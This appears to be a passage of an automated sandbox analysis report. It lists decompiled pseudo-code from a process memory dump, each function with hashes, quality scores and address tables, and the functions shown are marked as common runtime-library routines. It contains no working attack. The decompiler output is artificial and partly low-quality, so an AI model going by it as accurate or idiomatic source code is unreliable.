Opcode ID: 37766f0dc3f88e35de240b9bbf6ed12c864020f1491351eb57134fa6e6619515
Instruction ID: cac49b51ef897637bb7ef90f49e3e2ba6fa2659b2816d0a847ffca558a2acfd1
Opcode Fuzzy Hash: 37766f0dc3f88e35de240b9bbf6ed12c864020f1491351eb57134fa6e6619515
Instruction Fuzzy Hash: B831B4B2A00619EBDB11AF65CD42ABFB7B9FF04700F014069F941D7281EB799D11EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00FE4A2C, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E00FE4A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x109d360 ^ _t62;
				_v8 =  *0x109d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E00FC2280(_t26, 0x1098608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E00FBFFB0(_t41, _t51, 0x1098608);
						L2:
						 *0x109b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E00FEB640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E00FC2280(_t28, 0x1098608);
							_t32 = _v24;
							if( *_t32 == _t58) {
								 *_t32 = _t42;
								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
								if(_t58 != 0) {
									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
									asm("sbb edi, edi");
									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
								}
							}
							E00FBFFB0(_t42, _t53, 0x1098608);
							if(_t53 != 0) {
								L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						_t29 = _t42;
						goto L5;
					}
					if( *((char*)(_t58 + 0x40)) != 0) {
						L10:
						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
						E00FBFFB0(_t41, _t51, 0x1098608);
						_t29 = _t58;
						goto L5;
					}
					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
						goto L11;
					}
					goto L10;
				}
				L1:
				_v13 = 0;
				_t58 = 0;
				goto L2;
			}

0x00fe4a2c
0x00fe4a34
0x00fe4a3c
0x00fe4a3e
0x00fe4a48
0x00fe4a4b
0x00fe4a4d
0x00fe4a51
0x00fe4a9c
0x00000000
0x00000000
0x00fe4aa3
0x00fe4aa8
0x00fe4aad
0x00fe4ab1
0x00fe4ade
0x00fe4ae3
0x00fe4a5a
0x00fe4a62
0x00fe4a6a
0x00fe4a6e
0x0101f203
0x00fe4a84
0x00fe4a88
0x00fe4a89
0x00fe4a8a
0x00fe4a95
0x00fe4a95
0x00fe4a79
0x00fe4a80
0x00fe4af2
0x00fe4af4
0x00fe4af9
0x00fe4aff
0x00fe4b01
0x00fe4b03
0x00fe4b08
0x0101f20a
0x0101f212
0x0101f216
0x0101f216
0x00fe4b08
0x00fe4b13
0x00fe4b1a
0x0101f229
0x0101f229
0x00fe4b1a
0x00fe4a82
0x00000000
0x00fe4a82
0x00fe4ab7
0x00fe4acd
0x00fe4acd
0x00fe4ad5
0x00fe4ada
0x00000000
0x00fe4ada
0x00fe4ac2
0x00fe4acb
0x00000000
0x00000000
0x00000000
0x00fe4acb
0x00fe4a53
0x00fe4a53
0x00fe4a58
0x00000000

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d75f51ca190f7eab25ed15d538591fb6f4f919469c58d74ff196466a2be5fd6
Instruction ID: 67496a88bca798021a1ccb93e3dfbaa72b30bc59cc595b90d325954bfb3ec1fd
Opcode Fuzzy Hash: 1d75f51ca190f7eab25ed15d538591fb6f4f919469c58d74ff196466a2be5fd6
Instruction Fuzzy Hash: 643134326453819BCB219F16CD85B2AB7A5FF85B20F41452DF8924B241CB78EC04EB85

Uniqueness

Uniqueness Score: -1.00%

Function 00FE8EC7, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00FE8EC7(void* __ecx, void* __edx) {
				signed int _v8;
				signed int* _v16;
				intOrPtr _v20;
				signed int* _v24;
				char* _v28;
				signed int* _v32;
				intOrPtr _v36;
				signed int* _v40;
				signed int* _v44;
				signed int* _v48;
				intOrPtr _v52;
				signed int* _v56;
				signed int* _v60;
				signed int* _v64;
				intOrPtr _v68;
				signed int* _v72;
				char* _v76;
				signed int* _v80;
				signed int _v84;
				signed int* _v88;
				intOrPtr _v92;
				signed int* _v96;
				intOrPtr _v100;
				signed int* _v104;
				signed int* _v108;
				char _v140;
				signed int _v144;
				signed int _v148;
				signed int* _v152;
				char _v156;
				signed int* _v160;
				char _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t67;
				intOrPtr _t70;
				void* _t71;
				void* _t72;
				signed int _t73;

				_t69 = __edx;
				_v8 =  *0x109d360 ^ _t73;
				_t48 =  *[fs:0x30];
				_t72 = __edx;
				_t71 = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
					_t48 = E00FD4E70(0x10986e4, 0xfe9490, 0, 0);
					if( *0x10953e8 > 5 && E00FE8F33(0x10953e8, 0, 0x2000) != 0) {
						_v156 =  *((intOrPtr*)(_t71 + 0x44));
						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
						_v164 =  *((intOrPtr*)(_t72 + 0x58));
						_v108 =  &_v84;
						_v92 =  *((intOrPtr*)(_t71 + 0x28));
						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
						_v76 =  &_v156;
						_t70 = 8;
						_v60 =  &_v144;
						_t67 = 4;
						_v44 =  &_v148;
						_v152 = 0;
						_v160 = 0;
						_v104 = 0;
						_v100 = 2;
						_v96 = 0;
						_v88 = 0;
						_v80 = 0;
						_v72 = 0;
						_v68 = _t70;
						_v64 = 0;
						_v56 = 0;
						_v52 = 0x10953e8;
						_v48 = 0;
						_v40 = 0;
						_v36 = 0x10953e8;
						_v32 = 0;
						_v28 =  &_v164;
						_v24 = 0;
						_v20 = _t70;
						_v16 = 0;
						_t69 = 0xf8bc46;
						_t48 = E01027B9C(0x10953e8, 0xf8bc46, _t67, 0x10953e8, _t70,  &_v140);
					}
				}
				return E00FEB640(_t48, 0, _v8 ^ _t73, _t69, _t71, _t72);
			}

0x00fe8ec7
0x00fe8ed9
0x00fe8edc
0x00fe8ee6
0x00fe8ee9
0x00fe8eee
0x00fe8efc
0x00fe8f08
0x01021349
0x01021353
0x0102135d
0x01021366
0x0102136f
0x01021375
0x0102137c
0x01021385
0x01021390
0x01021391
0x0102139c
0x0102139d
0x010213a6
0x010213ac
0x010213b2
0x010213b5
0x010213bc
0x010213bf
0x010213c2
0x010213c5
0x010213c8
0x010213cb
0x010213ce
0x010213d1
0x010213d4
0x010213d7
0x010213da
0x010213dd
0x010213e0
0x010213e3
0x010213e6
0x010213e9
0x010213f6
0x01021400
0x01021400
0x00fe8f08
0x00fe8f32

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00e5281e44786294a6e7b491159b2e89cec59aa1b619468dd3a1bcf7e8596f36
Instruction ID: deb910100ae05a1108f974c720640169ef3303401a0af098d760905ff3d0e572
Opcode Fuzzy Hash: 00e5281e44786294a6e7b491159b2e89cec59aa1b619468dd3a1bcf7e8596f36
Instruction Fuzzy Hash: 5741B1B1D002589FDB20DFAAD981AEDFBF4FB48310F5081AEE549A7240DB745A45DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00FDE730, Relevance: .1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E00FDE730(void* __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr* _a40) {
				intOrPtr* _v0;
				signed char _v4;
				signed int _v8;
				void* __ecx;
				void* __ebp;
				void* _t37;
				intOrPtr _t38;
				signed int _t44;
				signed char _t52;
				void* _t54;
				intOrPtr* _t56;
				void* _t58;
				char* _t59;
				signed int _t62;

				_t58 = __edx;
				_push(0);
				_push(4);
				_push( &_v8);
				_push(0x24);
				_push(0xffffffff);
				if(E00FE9670() < 0) {
					L00FFDF30(_t54, _t58, _t35);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					_push(_t54);
					_t52 = _v4;
					if(_t52 > 8) {
						_t37 = 0xc0000078;
					} else {
						_t38 =  *0x1097b9c; // 0x0
						_t62 = _t52 & 0x000000ff;
						_t59 = L00FC4620(8 + _t62 * 4,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0x140000, 8 + _t62 * 4);
						if(_t59 == 0) {
							_t37 = 0xc0000017;
						} else {
							_t56 = _v0;
							 *(_t59 + 1) = _t52;
							 *_t59 = 1;
							 *((intOrPtr*)(_t59 + 2)) =  *_t56;
							 *((short*)(_t59 + 6)) =  *((intOrPtr*)(_t56 + 4));
							_t44 = _t62 - 1;
							if(_t44 <= 7) {
								switch( *((intOrPtr*)(_t44 * 4 +  &M00FDE810))) {
									case 0:
										L6:
										 *((intOrPtr*)(_t59 + 8)) = _a8;
										goto L7;
									case 1:
										L13:
										 *((intOrPtr*)(__edx + 0xc)) = _a12;
										goto L6;
									case 2:
										L12:
										 *((intOrPtr*)(__edx + 0x10)) = _a16;
										goto L13;
									case 3:
										L11:
										 *((intOrPtr*)(__edx + 0x14)) = _a20;
										goto L12;
									case 4:
										L10:
										 *((intOrPtr*)(__edx + 0x18)) = _a24;
										goto L11;
									case 5:
										L9:
										 *((intOrPtr*)(__edx + 0x1c)) = _a28;
										goto L10;
									case 6:
										L17:
										 *((intOrPtr*)(__edx + 0x20)) = _a32;
										goto L9;
									case 7:
										 *((intOrPtr*)(__edx + 0x24)) = _a36;
										goto L17;
								}
							}
							L7:
							 *_a40 = _t59;
							_t37 = 0;
						}
					}
					return _t37;
				} else {
					_push(0x20);
					asm("ror eax, cl");
					return _a4 ^ _v8;
				}
			}

0x00fde730
0x00fde736
0x00fde738
0x00fde73d
0x00fde73e
0x00fde740
0x00fde749
0x00fde765
0x00fde76a
0x00fde76b
0x00fde76c
0x00fde76d
0x00fde76e
0x00fde76f
0x00fde775
0x00fde777
0x00fde77e
0x0101b675
0x00fde784
0x00fde784
0x00fde789
0x00fde7a8
0x00fde7ac
0x00fde807
0x00fde7ae
0x00fde7ae
0x00fde7b1
0x00fde7b4
0x00fde7b9
0x00fde7c0
0x00fde7c4
0x00fde7ca
0x00fde7cc
0x00000000
0x00fde7d3
0x00fde7d6
0x00000000
0x00000000
0x00fde7ff
0x00fde802
0x00000000
0x00000000
0x00fde7f9
0x00fde7fc
0x00000000
0x00000000
0x00fde7f3
0x00fde7f6
0x00000000
0x00000000
0x00fde7ed
0x00fde7f0
0x00000000
0x00000000
0x00fde7e7
0x00fde7ea
0x00000000
0x00000000
0x0101b685
0x0101b688
0x00000000
0x00000000
0x0101b682
0x00000000
0x00000000
0x00fde7cc
0x00fde7d9
0x00fde7dc
0x00fde7de
0x00fde7de
0x00fde7ac
0x00fde7e4
0x00fde74b
0x00fde751
0x00fde759
0x00fde761
0x00fde761

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59dbc1fb15853791ca980126772678ac698d7fec989d89e3358f8d40911b86d6
Instruction ID: e97f3ddff9e6f88607bfdfdcb72d759bc6aacc70694c0c90ab186e961d736ebc
Opcode Fuzzy Hash: 59dbc1fb15853791ca980126772678ac698d7fec989d89e3358f8d40911b86d6
Instruction Fuzzy Hash: 9231A075A14249EFD744DF28C841F9ABBE5FB09314F14825AFA18CB341D635EC80EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FDBC2C, Relevance: .1, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00FDBC2C(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				intOrPtr _t22;
				intOrPtr* _t41;
				intOrPtr _t51;

				_t51 =  *0x1096100; // 0x5
				_v12 = __edx;
				_v8 = __ecx;
				if(_t51 >= 0x800) {
					L12:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t22 = _t51;
					asm("lock cmpxchg [ecx], edx");
					if(_t51 == _t22) {
						break;
					}
					_t51 = _t22;
					if(_t22 < 0x800) {
						continue;
					}
					goto L12;
				}
				E00FC2280(0xd, 0x52ef1a0);
				_t41 =  *0x10960f8; // 0x0
				if(_t41 != 0) {
					 *0x10960f8 =  *_t41;
					 *0x10960fc =  *0x10960fc + 0xffff;
				}
				E00FBFFB0(_t41, 0x800, 0x52ef1a0);
				if(_t41 != 0) {
					L6:
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)(_t41 + 0x1c)) = _v12;
					 *((intOrPtr*)(_t41 + 0x20)) = _a4;
					 *(_t41 + 0x36) =  *(_t41 + 0x36) & 0x00008000 | _a8 & 0x00003fff;
					do {
						asm("lock xadd [0x10960f0], ax");
						 *((short*)(_t41 + 0x34)) = 1;
					} while (1 == 0);
					goto L8;
				} else {
					_t41 = L00FC4620(0x1096100,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xd0);
					if(_t41 == 0) {
						L11:
						asm("lock dec dword [0x1096100]");
						L8:
						return _t41;
					}
					 *(_t41 + 0x24) =  *(_t41 + 0x24) & 0x00000000;
					 *(_t41 + 0x28) =  *(_t41 + 0x28) & 0x00000000;
					if(_t41 == 0) {
						goto L11;
					}
					goto L6;
				}
			}

0x00fdbc36
0x00fdbc42
0x00fdbc45
0x00fdbc4a
0x00fdbd35
0x00000000
0x00000000
0x00000000
0x00000000
0x00fdbc50
0x00fdbc50
0x00fdbc58
0x00fdbc5a
0x00fdbc60
0x00000000
0x00000000
0x0101a4f2
0x0101a4f6
0x00000000
0x00000000
0x00000000
0x0101a4fc
0x00fdbc79
0x00fdbc7e
0x00fdbc86
0x00fdbd16
0x00fdbd20
0x00fdbd20
0x00fdbc8d
0x00fdbc94
0x00fdbcbd
0x00fdbcca
0x00fdbccb
0x00fdbccc
0x00fdbccd
0x00fdbcce
0x00fdbcd4
0x00fdbcea
0x00fdbcee
0x00fdbcf2
0x00fdbd00
0x00fdbd04
0x00000000
0x00fdbc96
0x00fdbcab
0x00fdbcaf
0x00fdbd2c
0x00fdbd2c
0x00fdbd09
0x00000000
0x00fdbd09
0x00fdbcb1
0x00fdbcb5
0x00fdbcbb
0x00000000
0x00000000
0x00000000
0x00fdbcbb

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 753a542ec429a16000a1c09b922bddab06b5a5b50e6e0ac61fb71744cba6ccd2
Instruction ID: 451e00c538af1def61474e20fcc4d8e8cfcb9f6b83cfcbd9e6ee947763a63e18
Opcode Fuzzy Hash: 753a542ec429a16000a1c09b922bddab06b5a5b50e6e0ac61fb71744cba6ccd2
Instruction Fuzzy Hash: 79310376A00615DBCB21DF58C4C17A673B6FB58310F1A007AEC84DB305EB3ADD45AB80

Uniqueness

Uniqueness Score: -1.00%

Function 00FA9100, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00FA9100(signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __eflags) {
				signed int _t53;
				signed int _t56;
				signed int* _t60;
				signed int _t63;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr* _t72;
				void* _t78;
				void* _t79;
				signed int _t80;
				intOrPtr _t82;
				void* _t85;
				void* _t88;
				void* _t89;

				_t84 = __esi;
				_t70 = __ecx;
				_t68 = __ebx;
				_push(0x2c);
				_push(0x107f6e8);
				E00FFD0E8(__ebx, __edi, __esi);
				 *((char*)(_t85 - 0x1d)) = 0;
				_t82 =  *((intOrPtr*)(_t85 + 8));
				if(_t82 == 0) {
					L4:
					if( *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E010788F5(_t68, _t70, _t78, _t82, _t84, __eflags);
					}
					L5:
					return E00FFD130(_t68, _t82, _t84);
				}
				_t88 = _t82 -  *0x10986c0; // 0xb407b0
				if(_t88 == 0) {
					goto L4;
				}
				_t89 = _t82 -  *0x10986b8; // 0x0
				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L4;
				} else {
					E00FC2280(_t82 + 0xe0, _t82 + 0xe0);
					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
					__eflags =  *((char*)(_t82 + 0xe5));
					if(__eflags != 0) {
						E010788F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
						goto L12;
					} else {
						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E00FEAFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x109b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x10984c0;
										if(_t69 >=  *0x10984c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E01079063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E00FA922A(_t82);
							_t53 = E00FC7D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E01078B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x10986c0; // 0xb407b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x10986b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x10986bc;
										_t72 = 0x10986b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E00FA9240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x10986c4;
									_t72 = 0x10986c0;
									L18:
									E00FD9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}

0x00fa9100
0x00fa9100
0x00fa9100
0x00fa9100
0x00fa9102
0x00fa9107
0x00fa910c
0x00fa9110
0x00fa9115
0x00fa9136
0x00fa9143
0x010037e4
0x010037e4
0x00fa9149
0x00fa914e
0x00fa914e
0x00fa9117
0x00fa911d
0x00000000
0x00000000
0x00fa911f
0x00fa9125
0x00000000
0x00fa9151
0x00fa9158
0x00fa915d
0x00fa9161
0x00fa9168
0x01003715
0x00000000
0x00fa916e
0x00fa916e
0x00fa9175
0x00fa9177
0x00fa917e
0x00fa917f
0x00fa9182
0x00fa9182
0x00fa9187
0x00fa9187
0x00fa918a
0x00fa918d
0x00fa918f
0x00fa9192
0x00fa9195
0x00fa9198
0x00fa9198
0x00fa9198
0x00fa919a
0x00000000
0x00000000
0x0100371f
0x01003721
0x01003727
0x0100372f
0x01003733
0x01003735
0x01003738
0x0100373b
0x0100373d
0x01003740
0x00000000
0x00000000
0x01003746
0x01003749
0x00000000
0x00000000
0x0100374f
0x01003751
0x00000000
0x00000000
0x01003757
0x01003759
0x0100375c
0x0100375c
0x0100375e
0x0100375e
0x01003761
0x01003764
0x00000000
0x00000000
0x01003766
0x01003768
0x010037a3
0x010037a3
0x010037a5
0x010037a7
0x010037ad
0x010037b0
0x010037b2
0x010037bc
0x010037c2
0x010037c2
0x010037b2
0x00fa9187
0x00fa9187
0x00fa918a
0x00fa918d
0x00fa918f
0x00fa9192
0x00fa9195
0x00000000
0x00fa9195
0x00000000
0x00fa9187
0x0100376a
0x0100376a
0x0100376c
0x0100376c
0x0100376f
0x01003775
0x00000000
0x00000000
0x01003777
0x01003779
0x00000000
0x00000000
0x01003782
0x01003787
0x01003789
0x01003790
0x01003790
0x0100378b
0x0100378b
0x0100378b
0x01003792
0x01003795
0x01003795
0x01003798
0x01003798
0x0100379b
0x0100379b
0x00fa91a3
0x00fa91a9
0x00fa91b0
0x00fa91b4
0x00fa91b4
0x00fa91bb
0x00fa91c0
0x00fa91c5
0x00fa91c7
0x010037da
0x00fa91cd
0x00fa91cd
0x00fa91cd
0x00fa91d2
0x00fa91d5
0x00fa9239
0x00fa9239
0x00fa91d7
0x00fa91db
0x00fa91e1
0x00fa91e7
0x00fa91fd
0x00fa9203
0x00fa921e
0x00fa9223
0x00000000
0x00fa9223
0x00fa9205
0x00fa9208
0x00fa920c
0x00fa9214
0x00fa9214
0x00fa91e9
0x00fa91e9
0x00fa91ee
0x00fa91f3
0x00fa91f3
0x00fa91f3
0x00fa91e7
0x00000000
0x00fa91db
0x00fa9187
0x00fa9168

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56b8cbe2f53a6ddcd97f651340b78be4234308c9d8b3b373698ed1faaec4366d
Instruction ID: 78b4221f0dc585df0cb922a09e4fcc08a8750616e2a1759ae461fb0db439f7bb
Opcode Fuzzy Hash: 56b8cbe2f53a6ddcd97f651340b78be4234308c9d8b3b373698ed1faaec4366d
Instruction Fuzzy Hash: D331D8B5E08246DFDB62DB68C448BADB7F1BF4A320F14816AD4456B341C3B5A940E751

Uniqueness

Uniqueness Score: -1.00%

Function 00FD1DB5, Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E00FD1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E00FCF460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L00FC4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E00FCF460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}

0x00fd1dc2
0x00fd1dc5
0x00fd1dc7
0x00fd1dcc
0x00fd1dce
0x00fd1dd6
0x00fd1ddf
0x00fd1de0
0x00fd1de1
0x00fd1de5
0x00fd1de8
0x00fd1def
0x00fd1df0
0x00fd1df6
0x00fd1df7
0x00fd1dfe
0x00fd1e1a
0x00000000
0x00000000
0x00fd1e0b
0x00fd1e12
0x00fd1e12
0x00fd1e00
0x00fd1e00
0x00fd1e05
0x00fd1e1e
0x00fd1e23
0x0101570f
0x01015713
0x00000000
0x00000000
0x01015719
0x01015719
0x00fd1e2c
0x00fd1e2d
0x00fd1e2e
0x00fd1e2f
0x00fd1e31
0x00fd1e32
0x00fd1e35
0x00fd1e3d
0x01015723
0x0101573d
0x0101573d
0x00000000
0x01015723
0x00fd1e49
0x00fd1e4e
0x00fd1e4e
0x00fd1e09
0x00000000

Memory Dump Source

Source File: 00000003.00000002.378092781.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction ID: 156ef9139b27232ea14f53370af5eef0f75b2f99ca8d8e777357195938b14d82
Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction Fuzzy Hash: C6216D72A00219BBD721CF99DD81FABBBBAFF85750F154056E9059B310D634AE01EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00FC0050, Relevance: .1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00FC0050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x109d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E00FD9ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E00FEB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
